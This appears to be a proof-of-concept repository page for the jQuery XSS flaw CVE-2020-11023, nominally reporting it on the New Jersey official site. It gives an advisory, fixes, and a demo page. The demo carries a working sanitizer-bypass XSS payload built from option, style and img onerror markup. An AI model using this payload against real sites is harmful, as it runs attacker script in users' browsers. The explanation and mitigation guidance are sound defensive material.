
CVE-2020-11023 PoC — jQuery cross-site scripting vulnerability

Source
Associated Vulnerability
Title: jQuery cross-site scripting vulnerability (CVE-2020-11023)
Description: jQuery is an open-source, cross-browser JavaScript library originally written by the American developer John Resig. It simplifies working with HTML from JavaScript and supports modular, plugin-based extension. jQuery versions from 1.0.3 up to, but not including, 3.5.0 contain a cross-site scripting vulnerability. The flaw lies in how jQuery's DOM manipulation methods process HTML that contains `<option>` elements: markup from an untrusted source can execute client-side code even after the web application has sanitized it, so input validation alone is not sufficient. An attacker can exploit the flaw to run script in the victim's browser.
Description
Vulnerability Report of the New Jersey official site
Readme
# https-nj.gov---CVE-2020-11023
#### Vulnerability Report of the New Jersey official site
Potential XSS vulnerability when appending HTML containing option elements.

Passing HTML containing `<option>` elements from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (e.g. `.html()`, `.append()`, and others) may execute untrusted code. The root cause is a parsing-context mismatch: a DOM-based sanitizer parses the string in the context it was given, but jQuery before 3.5.0 wrapped any markup starting with `<option>` in a `<select multiple='multiple'>` element before parsing it, so content the sanitizer saw as inert text can be re-parsed as live elements with event handlers.

# RECOMMENDATION
This problem is patched in jQuery 3.5.0; upgrading to 3.5.0 or later is therefore the recommended fix.
To mitigate the bug without upgrading, use [DOMPurify](https://github.com/cure53/DOMPurify) with its `SAFE_FOR_JQUERY` option to sanitize the HTML string before passing it to a jQuery method. That option exists specifically to work around jQuery's pre-3.5.0 behaviour, so check that the DOMPurify release you deploy still documents it; a sanitizer without it does not protect against this issue, as the advisory text above notes.

The workaround requires jQuery 1.12/2.2 or later.
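The parsing-context mismatch described above and the reason the 3.5.0 fix works can be reproduced without jQuery or DOMPurify at all. The page below is an example added by the editor, not code from the PoC repository, from jQuery or from DOMPurify. It reproduces the one relevant piece of jQuery's pre-3.5.0 behaviour, the `<select multiple='multiple'>` wrapper that its internal `wrapMap` applied to markup whose first tag was `<option>`, using plain DOM calls, and parses a single constructed input both in plain body context (what a DOM-based sanitizer that allows `<style>` sees, and what jQuery 3.5.0+ does in browsers that can parse `<option>` inside a `<div>`) and inside the legacy wrapper. The input string, the element id and the `recordHit` handler name are all constructed for this example.

```html
<!DOCTYPE html>
<meta charset="utf-8">
<title>CVE-2020-11023 parsing-context demo (added example)</title>
<pre id="out"></pre>
<script>
// Added example: no jQuery is loaded. It models only the behaviour that
// matters for CVE-2020-11023: jQuery < 3.5.0 wrapped an HTML string whose
// first tag was <option> in <select multiple='multiple'>...</select>
// (its wrapMap.option entry) before parsing it, so the string was parsed
// in the HTML parser's "in select" insertion mode rather than the "in body"
// mode a DOM sanitizer used when it inspected the same string.

// Constructed input. Parsed in body context it becomes option > style,
// and everything after <style> up to </style> is raw text, so a sanitizer
// that permits <style> sees no <img> element and nothing to strip.
var sanitizedLooking =
  '<option><style></option></select><img src=x onerror="recordHit()"></style>';

var hits = 0;

// Runs only if a real <img> element with an onerror attribute was created.
function recordHit() {
  hits++;
  report("onerror handler ran: a live <img> element was created");
}

function report(line) {
  document.getElementById("out").textContent += line + "\n";
}

// Parse the way a DOM sanitizer (and jQuery >= 3.5.0) does: straight into a div.
function parseInBodyContext(html) {
  var div = document.createElement("div");
  div.innerHTML = html;
  return div;
}

// Parse the way jQuery < 3.5.0 did for markup starting with <option>.
// Inside <select> the HTML parser ignores a <style> start tag, so the text
// the sanitizer saw as raw <style> content becomes live markup: </option>
// and </select> close the wrapper and <img ...> becomes a real element.
function parseAsLegacyJQueryOption(html) {
  var div = document.createElement("div");
  div.innerHTML = "<select multiple='multiple'>" + html + "</select>";
  return div;
}

function countImages(container) {
  return container.querySelectorAll("img").length;
}

var bodyCtx = parseInBodyContext(sanitizedLooking);
var selectCtx = parseAsLegacyJQueryOption(sanitizedLooking);

report("body context (sanitizer / jQuery 3.5.0+): img elements = " + countImages(bodyCtx));
report("  serialized: " + bodyCtx.innerHTML);
report("select wrapper (jQuery < 3.5.0):         img elements = " + countImages(selectCtx));
report("  serialized: " + selectCtx.innerHTML);

// Attach the legacy result so the <img> (if any) requests src=x, fails to
// load and fires its onerror attribute, exactly as an injected handler would.
document.body.appendChild(selectCtx);
</script>
```

Open the file in a browser and compare the two serializations: the body-context parse keeps the `<img ...>` text inside the `<style>` element, while the `<select>`-wrapped parse produces a real `<img>` sibling of the `<select>`, after which the `onerror` handler runs. That is the whole vulnerability: the sanitizer and jQuery agreed on the characters but not on the parse tree. jQuery 3.5.0 removed the unconditional `<option>` wrapper in browsers that can parse `<option>` inside a `<div>`, so both sides now parse in the same context; DOMPurify's `SAFE_FOR_JQUERY` option attacks the same mismatch from the other side by escaping `<` in text content that could be re-parsed as markup.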

# REFERENCES
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
#### For more information
If you have any questions or comments about this advisory, search for a relevant issue in the [jQuery repo](https://github.com/jquery/jquery/issues). If you don't find an answer, open a new issue.
File Snapshot

[4.0K] /data/pocs/236a73a2f1f3555f6f1896b4715eae34f27a3e8f
└── [1.0K] README.md

0 directories, 1 file